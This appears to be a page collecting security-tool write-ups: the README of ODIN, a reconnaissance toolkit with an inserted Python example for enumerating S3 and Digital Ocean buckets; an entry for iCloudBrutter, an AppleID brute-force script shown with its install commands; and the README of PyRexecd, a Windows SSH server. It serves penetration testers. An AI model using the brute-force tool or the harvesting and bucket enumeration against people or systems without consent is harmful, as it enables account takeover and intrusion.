    Make sure the modules below are installed; if one is missing, install it with: pip install [module name]
    • argparse
    • socks
    • socket
    • requests
    • sys
    Note that argparse, socket and sys ship with the Python standard library; only requests and PySocks (which provides the socks module) need to be installed with pip.

    Contact :
    Twitter.com/moh_security


    ODIN - Tool For Automating Penetration Testing Tasks


    ODIN is made possible through the help, input, and work provided by others. Therefore, this project is entirely open source and available to all to use/modify. All this developer did was assemble the tools, convert some of them to Python 3, and stitch them together into an all-in-one toolkit.

    What Can ODIN Do?
    ODIN is still very much in development, but it aims to automate many of the common recon tasks carried out by penetration testers, such as:
    • Harvesting email addresses and employee names for a company.
    • Linking employees and companies to social media profiles.
    • Checking to see if discovered accounts have been a part of any public security breaches or appeared in any pastes.
    • Collecting data on domains and IP addresses from Shodan, Censys, DNS records, and whois/RDAP.
    • Discovering subdomains, their related IP addresses, and looking for CDNs that might allow for domain fronting.
    • Hunting Office files and PDFs under a domain, downloading them, and extracting metadata.
    • Linking key words, like a company name or domain, to AWS via S3 buckets and account aliases.
    • More to come in the future...

    Getting Started

    Installing ODIN
    ODIN requires Python 3. Using pipenv for managing the required libraries is the best option to avoid Python installations getting mixed-up.
    1. Run pip3 install --user pipenv or python3 -m pip install --user pipenv.
    2. Run git clone https://github.com/chrismaddalena/ODIN.git.
    3. Run cd ODIN && pipenv install.
    4. Run pipenv shell to get started using ODIN.
    Note: On macOS you may get an error about pew not being in your PATH after installing pipenv and attempting to install ODIN. To fix it, follow these steps in order:
    • Uninstall virtualenv, pipenv, and pew.
    • Install virtualenv
    • Install pew
    • Install pipenv

    Setup API Keys
    1. Review the keys.config.sample file to fill-in your API keys and create a keys.config file.
    2. cd into the /setup directory and run setup_check.py to make sure your keys.config file is in order.
    3. Install awscli and run aws configure.

    The APIs and Services
    ODIN uses several APIs to gather information. Some of these require an API key, but most of the APIs are free. That is to say, you can get a free key and then pay for more requests/day. Shodan is a good example of this. You may prefer to not use APIs at all for one reason or another. You can still use ODIN, but a few of the APIs are just really fantastic and you should consider using them, specifically Censys and Shodan.

    Whois and RDAP
    Both of these services are used to collect data on domains and IP addresses. This includes attaching domains to IP addresses, identifying the network CIDRs for these addresses, and pulling information about the owners.
    No API key is needed.

    Robtex
    The Robtex free REST API is used to collect domain names tied to IP addresses. This information is displayed alongside the RDAP information for IP addresses, so you can see what else is hosted at that IP address.
    No API key is needed.

    Shodan
    Shodan is used to search for domains and lookup hosts (IP addresses). This pulls in information like open ports, banners, hostnames, and location data. Shodan also flags hosts for well known vulnerabilities like Heartbleed. This data is recorded as well, if it exists, but does tend to be outdated (or just wrong) a lot of the time.
    Sign-up for an account to get your API key: shodan.io

    Censys
    Censys is very much like Shodan, except less information about open ports/services is available. However, Censys provides a way to search for certificates tied to a domain. This can be a lot of data, but you may find new hosts, like those tied to an employee's email address and used for a VPS in the cloud.
    Sign-up for an account to get your API key: censys.io

    URLVoid
    URLVoid offers reputation data for domains, including Alexa and Google rankings, domain age, and location data. It also keeps track of domains that have been flagged for malicious activity by various entities (e.g. Fortinet, Avira).
    This may be the most "skippable" of the APIs, but some of the data can be useful and worthwhile. It's included for those occasions.
    Sign-up for an account to get your API key: urlvoid.com/api

    Twitter
    If you set up a Twitter app for ODIN, the tokens can be used with Tweepy to collect account data (e.g. real name, location, follower count, and user description) from Twitter profiles ODIN has linked to the target organization.
    In the future, this may be used to collect analytics from Twitter to help you find very active users or get a profile of them.
    Become a Twitter developer by going to dev.twitter.com and then create an app on apps.twitter.com.

    Cymon
    eSentire's Cymon is used to check domains and IP addresses to see if the target appears in any of Cymon's collected threat intelligence feeds. This is used for reputation checks, but also used in combination with urlcrazy to check similar, registered domains to see if the domain or the domain's A-record IP addresses have been reported.
    Note that appearing in a threat feed doesn't mean something is wrong or that Cymon has bad data. A domain may have been used for phishing, been detected and seized, and is now dormant with the old malicious A records. Then you have things like cloud service IPs that change hands often. Events like that can lead to a domain or IP being used for malicious activities one day and safe the next. Always investigate these findings before crying wolf to your client.
    Sign-up for an account to get your API key: cymon.io

    HaveIBeenPwned
    Email addresses are checked against HIBP to determine if any email addresses for the organization have been mentioned in any pastes or been involved in any security breaches.
    No API key is needed.

    DNS Dumpster
    DNS Dumpster is a cool project you can find at dnsdumpster.com. Subdomain information is collected from DNS Dumpster, including a neat domain map image!
    No API key is needed.

    NetCraft
    ODIN will check NetCraft for domain history and known subdomains. This does require a web driver for Selenium. If you download a driver and provide the path to it in your keys.config file (Yes, this isn't really a key, but so be it), NetCraft searches will be kicked off automatically when you perform domain OSINT.
    The Chrome web driver is recommended, but the Firefox/Gecko driver should work just fine, too.

    EmailHunter
    Meant for marketing folks to find leads and contacts at a company, this service offers free API keys for harvesting contact information organized by company/domain. Hunter will return names, email addresses, phone numbers, Twitter handles, LinkedIn profile links, and job titles.
    Sign-up for an account to get your API key: hunter.io

    Full Contact
    Full Contact support is implemented only for their Company API at the moment, but support for the People API may come in the future. For now, this is used to build a company profile based on a target domain, such as the client's primary domain used for email and their website. Full Contact catalogues everything from website info and company logo(s) to website blurbs and social media profiles.
    It's likely Full Contact will get some things wrong, such as number of employees. In my experience, the data is usually not too far off the mark, but the profile is only meant to act as a snapshot to get you started.
    Sign-up for an account to get your API key: app.fullcontact.com

    AWS
    Yes, Amazon Web Services. ODIN will perform recon against AWS to find things like S3 buckets and accounts names and aliases. Account names are strings of numbers, so you will need some idea of what you're looking for there. Aliases, however, can be anything, like a company name, and those can be validated as existing or not.
    By default, ODIN uses the client (-c) name and domain (-d) for searches. ODIN will search for the name with spaces stripped out, the domain with the TLD, and the domain without the TLD. Then ODIN will add some common suffixes and prefixes, like "downloads-" or "-apps", to these keywords.
    Optional wordlists can be provided for additional keywords and 'fixes. Keywords can be anything, really. Consider assembling a list of related words, alternate client names, etc.
    An AWS account and awscli are required.

    Digital Ocean
    ODIN will search for Digital Ocean Spaces just like it searches for S3 buckets. Spaces follows the same standards as S3, so it is simple to verify existing Spaces.
    No API key is needed.
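
    The keyword expansion described in the AWS section, and the note that Spaces follow the same conventions as S3, are simple enough to show end to end. The following is an added example, not ODIN's code: it builds the candidate bucket/space names from the client name and domain, filters them against S3 naming rules, and maps an HTTP status from a HEAD request to "absent / private / listable". The prefix and suffix lists are assumptions standing in for ODIN's, names are lowercased because bucket names must be, and the network probe is not exercised offline.

```python
import re
from itertools import product
import urllib.error
import urllib.request

# Added example, not ODIN's code: build the S3 / Spaces candidate names the AWS
# section describes (client name with spaces stripped, domain with and without
# its TLD, plus common prefixes and suffixes) and check them. The prefix and
# suffix lists are assumptions; names are lowercased because bucket names must be.

PREFIXES = ["", "dev-", "staging-", "prod-", "backup-", "downloads-"]
SUFFIXES = ["", "-dev", "-staging", "-prod", "-backup", "-apps", "-assets"]
# S3 naming rules: 3-63 chars, lowercase letters, digits, dots, hyphens,
# start/end alphanumeric, no adjacent dots.
BUCKET_RE = re.compile(r"^[a-z0-9][a-z0-9.-]{1,61}[a-z0-9]$")


def base_keywords(client: str, domain: str) -> set:
    """Keywords derived from the -c client name and -d domain."""
    domain = domain.lower()
    return {client.replace(" ", "").lower(), domain, domain.split(".")[0]} - {""}


def candidate_names(client, domain, extra_keywords=(), prefixes=PREFIXES, suffixes=SUFFIXES):
    """Sorted list of valid bucket/space names built from keywords and 'fixes."""
    keywords = base_keywords(client, domain) | {k.lower() for k in extra_keywords}
    names = set()
    for keyword, pre, suf in product(keywords, prefixes, suffixes):
        name = f"{pre}{keyword}{suf}"
        if BUCKET_RE.match(name) and ".." not in name:
            names.add(name)
    return sorted(names)


def s3_url(bucket: str) -> str:
    return f"https://{bucket}.s3.amazonaws.com/"


def spaces_url(space: str, region: str = "nyc3") -> str:
    """Digital Ocean Spaces use the same virtual-hosted layout as S3."""
    return f"https://{space}.{region}.digitaloceanspaces.com/"


def probe(url: str, timeout: float = 5.0) -> int:
    """Network check (not exercised offline). 404: no such bucket,
    403: exists but denies anonymous access, 200: anonymously listable."""
    req = urllib.request.Request(url, method="HEAD")
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


if __name__ == "__main__":
    for name in candidate_names("Example Corp", "example.com")[:5]:
        print(name, s3_url(name), spaces_url(name))
```

    A 403 is a finding in its own right: the bucket exists under a name tied to the client, which is worth reporting even when nothing in it is readable anonymously.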

    FAQ
    I get this syntax error. What's the deal?
    Please make sure you are using Python 3, not Python 2.7 or earlier. I recommend using pipenv.
    I get an error when ODIN tries to import a library. What's wrong?
    Like above, please make sure you are using Python 3. ODIN must be run in Python 3 and the requirements must be installed using pip or pip3 for Python 3. To make sure all required libraries are installed for Python 3, use pipenv and the provided Pipfile. The Pipfile enforces Python 3, so you should be good to go.
    See the installation instructions at the top.
    Why do you not like "why not" questions?
    If you ask "why not use X API" or "why not do Y like this," that's not very helpful. Presumably, the question is meant to convey the idea that X would be a good addition or Y is a bad way to accomplish a task and you want to know the reason it is not currently supported. The answer is most likely "I wasn't aware of this." That also means I don't know anything about it. :)
    If you have a suggestion for a change, service, or API, please explain what it does and provide some details explaining why you think it would be a good addition.
    Why not add support for the Clearbit API?
    Clearbit looks useful for OSINT, but the free tier is restricted to 20 API calls in a month. That may even be 20 API calls for the life of the account. The details are unclear. Either way, that's very restrictive and I want ODIN to be as simple and free to use as possible. The paid tiers are quite expensive.
    Why not use Wappalyzer?
    Wappalyzer is useful, but it's very difficult to automate fetching the results from Wappalyzer. Some tools can do this, but they use an unmaintained package called wappalyzer-python (https://github.com/scrapinghub/wappalyzer-python). This package still works, as far as I know, but there are several problems with it. The package has not been updated in three years, the developers have stated they have no plans to change that or support wappalyzer-python, and the package is Python 2. It could be used until it breaks one day, but the Python 2 bit is the real sticking point.
    Why not add support for the BuiltWith API?
    Like Clearbit, BuiltWith is a neat resource and some interesting details can be reviewed on the website. The API, however, is not free. The free version of the API won't give you any details, so at best it can be used to highlight a domain you may want to then review on the BuiltWith website. Scraping the website search results is certainly possible, but that could easily break and/or be unreliable.
    Adding support for BuiltWith hasn't been ruled out, but the goal is to make ODIN entirely free to use.
    Why not use Full Contact's People API?
    Currently only the Company API is used. There are plans to incorporate the People API in the future.
    Does ODIN perform DNS brute forcing?
    No, but it is being considered. However, brute forcing can take a long time and there are many tools that take care of this quite well. Those tools are not so easy to incorporate into ODIN without just running the commands for those tools. For subdomain discovery, it's hard to beat Aquatone right now and there's always Fierce and DNSRecon.
    For now, ODIN leverages DNS Dumpster, DNSRail, and NetCraft to collect subdomains to get you started.
    I don't have X API key, can I still use ODIN?
    Absolutely. If an API key is missing from the keys.config file, any checks using those keys will be skipped. You are strongly encouraged to go get the free API keys to get the most out of ODIN, but you can skip any you don't want.

    Special Thanks
    A big thank you to a few contributors who gave me the OK to re-use some of their code:
    • Ninjasl0th - Creator of the original scope verification script and all around cool dude!
    • 0xF1 - Architect behind Cymon and a great guy to have on your team!
    • GRC_Ninja - For providing great feedback regarding HTTP requests and RDAP.
    • Troy Hunt - For giving me permission to use HaveIBeenPwned's REST API in this way.
    And to these folks who have created/maintained some of the tools integrated into ODIN:

    Change Log

    March 6, 2018
    • Added support for detecting opportunities for DNS cache snooping.
    • Added a new option to provide a wordlist of terms to be used as prefixes and suffixes for S3 bucket hunting.
    • Added Pipfile to replace requirements.txt and avoid conflicts with Python 2.x installs.
    • Finally updated the URLCrazy module for the SQLite3 database change.

    January 3, 2018
    • Converted the old XLSX reports to a SQLite3 database solution!
    • Implemented multiprocessing (!) to greatly improve efficiency and shorten runtime!
    • Various other little bug fixes and tweaks.


    iCloudBrutter - AppleID Bruteforce


    iCloudBrutter is a simple Python (3.x) script to perform a basic bruteforce attack against AppleID.

    Usage of iCloudBrutter for attacking targets without prior mutual consent is illegal. The iCloudBrutter developer is not responsible for any damage caused by iCloudBrutter.

    Installation
    $ git clone https://github.com/m4ll0k/iCloudBrutter.git
    $ cd iCloudBrutter
    $ pip3 install requests urllib3 PySocks   # pip takes space-separated names; the socks module is provided by the PySocks package
    $ python3 icloud.py


    PyRexecd - Standalone SSH Server For Windows


    PyRexecd is a standalone SSH server for Windows.

    Features:
    • Standalone Win32 app (not a service) that resides in SysTray.
    • Supports a single user / pubkey auth only.
    • Notifies incoming connections via popup.
    • Sends/Receives the clipboard text via stdin/stdout.

    Prerequisites:

    How to Use:
    1. > pip install pyrexecd
    2. Run PyRexec.pyw.
      It generates a new host key and opens a config directory (AppData\Roaming\PyRexecd).
    3. Put your public key into the config dir.
      > copy your\id_rsa.pub authorized_keys
    4. Run PyRexec.pyw to start the server.
    5. Log into the machine via 2200/tcp.
      $ ssh -p 2200 windows

    Command Line Syntax:
    > pyrexecd.exe [-d] [-l logfile] [-s sshdir] [-L addr] [-p port]
    [-c cmdexe] [-u username] [-a authkeys] [-h homedir]
    ssh_host_key ...
    • -d : Turns on Debug mode (verbose logging).
    • -l logfile : Log file path (default: pyrexecd.log).
    • -s sshdir : Config directory path. (default: AppData\Roaming\PyRexecd)
    • -L a.b.c.d : Specifies the listen address (default: 127.0.0.1).
    • -p port : Specifies the listen port (default: 2200).
    • -c cmdexe : cmd.exe path. (default: cmd.exe)
    • -u username : Username.
    • -a authkeys : authorized_keys path. (default: authorized_keys)
    • -h homedir : Home directory path. (default: %UserProfile%)

    Special commands:
    Certain SSH commands are recognized as special commands:
    • @clipget : Receives the clipboard text from Windows.
      $ ssh windows @clipget > clipboard.txt
    • @clipset : Sends the clipboard text to Windows.
      $ echo foo | ssh windows @clipset
    • @open, @edit, and @print : Windows shell operation. The target pathname should be given from stdin.
      $ echo C:\User\euske\foo.txt | ssh windows @edit

    How to Build .exe (requires cx_Freeze):
    > pip install cx_Freeze
    > python setup_exe.py build

